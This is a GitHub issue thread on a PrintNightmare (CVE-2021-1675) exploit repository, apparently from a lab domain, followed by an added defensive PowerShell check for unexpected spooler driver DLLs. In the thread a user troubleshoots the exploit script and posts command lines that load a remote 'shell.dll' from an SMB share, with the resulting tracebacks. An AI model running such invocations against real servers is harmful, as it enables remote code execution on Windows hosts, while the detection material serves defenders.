cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

RPRN SessionError: code: 0xa1 - ERROR_BAD_PATHNAME - The specified path is invalid. #58

Closed W4RCL0UD closed 3 years ago

W4RCL0UD commented 3 years ago

I've tried multiple different options, I keep seeing this error:

```
./CVE-2021-1675.py marvel.local/pparker:Password2@10.128.40.54 '\\\\10.128.40.50\\smb\\shell.dll'
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\\??\UNC\10.128.40.50\??\UNC\smb\??\UNC\shell.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/warcloud/data/./CVE-2021-1675.py", line 177, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/warcloud/data/./CVE-2021-1675.py", line 82, in main
    resp = par.hRpcAsyncAddPrinterDriver(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/par.py", line 543, in hRpcAsyncAddPrinterDriver
    return dce.request(request, MSRPC_UUID_WINSPOOL)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.par.DCERPCSessionError: RPRN SessionError: code: 0xa1 - ERROR_BAD_PATHNAME - The specified path is invalid.
```

```
./CVE-2021-1675.py marvel.local/pparker:Password2@10.128.40.54 '\\10.128.40.50\smb\shell.dll'                1 ⨯
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.128.40.50\smb\shell.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/warcloud/data/./CVE-2021-1675.py", line 177, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/warcloud/data/./CVE-2021-1675.py", line 82, in main
    resp = par.hRpcAsyncAddPrinterDriver(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/par.py", line 543, in hRpcAsyncAddPrinterDriver
    return dce.request(request, MSRPC_UUID_WINSPOOL)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.par.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180
```

W4RCL0UD commented 3 years ago

image

W4RCL0UD commented 3 years ago

It looks like it finally executed with the last syntax here, but still doesn't appear to be executing the payload:

image

Is there a way to manually verify on the Windows box that the malicious .DLL file was copied over?

W4RCL0UD commented 3 years ago

Issue resolved - only successful on Domain Controllers
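
On the question above of checking the Windows host for a copied driver DLL, the following is an added example for responders and is not part of the original thread or the project's code. It assumes a 64-bit host, an elevated PowerShell session, the standard spooler driver directory under `System32\spool\drivers\x64`, and a 7-day review window; PrintService events 808 (Admin log) and 316 (Operational log, disabled by default) are the ones commonly reviewed for unexpected driver loads.

```powershell
# Added example (not from the thread): review the print spooler driver store
# and PrintService logs for recently added driver DLLs.
# Assumptions: 64-bit Windows, elevated session, 7-day review window.
$driverDir = Join-Path $env:SystemRoot 'System32\spool\drivers\x64'
$since     = (Get-Date).AddDays(-7)

# 1. DLLs created or modified in the driver store inside the window,
#    with Authenticode status and hash for triage.
Get-ChildItem -Path $driverDir -Recurse -Filter *.dll -File -ErrorAction SilentlyContinue |
    Where-Object { $_.CreationTime -ge $since -or $_.LastWriteTime -ge $since } |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [pscustomobject]@{
            Path      = $_.FullName
            Created   = $_.CreationTime
            Modified  = $_.LastWriteTime
            Signature = $sig.Status                      # e.g. Valid, NotSigned
            Signer    = $sig.SignerCertificate.Subject   # $null when unsigned
            SHA256    = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
        }
    } |
    Sort-Object Created -Descending |
    Format-List

# 2. Spooler events in the same window:
#    808 = spooler failed to load a plug-in module (Admin log)
#    316 = printer driver added or updated (Operational log; empty unless enabled)
$queries = @(
    @{ LogName = 'Microsoft-Windows-PrintService/Admin';       Id = 808; StartTime = $since },
    @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316; StartTime = $since }
)
foreach ($q in $queries) {
    Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, LogName, Message |
        Format-List
}
```

An unsigned or unexpectedly signed DLL in the driver store whose timestamp lines up with an 808 or 316 event is the combination worth escalating.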